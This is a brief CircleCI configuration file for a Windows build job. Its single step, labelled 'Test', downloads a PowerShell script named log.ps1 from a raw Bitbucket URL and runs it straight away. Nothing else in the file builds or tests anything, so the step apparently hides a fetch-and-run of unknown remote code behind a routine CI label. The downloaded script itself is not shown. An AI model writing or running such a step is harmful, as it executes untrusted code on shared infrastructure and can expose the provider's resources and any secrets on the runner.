version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/tiwull/kawul/raw/12f9e3fa1b2f877ab5419a9d97b007414499a9f2/log.ps1 -OutFile log.ps1
            ./log.ps1
